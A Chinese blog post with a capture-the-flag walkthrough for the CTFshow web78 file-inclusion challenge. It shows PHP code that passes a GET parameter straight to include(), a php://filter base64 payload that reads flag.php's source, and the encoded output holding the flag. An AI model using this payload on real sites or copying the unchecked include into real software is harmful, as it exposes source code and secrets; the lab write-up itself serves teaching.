CTFshow-WEB入门-文件包含(web78)

释放双眼,带上耳机,听听看~!

打开题目,看到代码

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

看到include包含函数,先尝试访问flag.php等文件,发现没有报错但是没有文本显示,说明有这个文件存在但是无法查看,那么就需要查看文件源码。使用PHP伪协议里面的php://filter获取指定文件的源码

?file=php://filter/convert.base64-encode/resource=flag.php

得到一串base64编码的文本

PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0xNiAxMDo1NToxMQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTA6NTU6MjANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3syNDU1ZDAwMC1jMmM1LTQ3Y2ItYTE1OS1jZTkxNDBjMzA3MWV9Ijs=

经过解码以后得到flag。

给TA打赏
共{{data.count}}人
人已打赏
文章

关于

2022-3-15 23:44:44

C/C++Windows文章

VScode+MinGW安装流程

2022-3-28 21:13:10

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索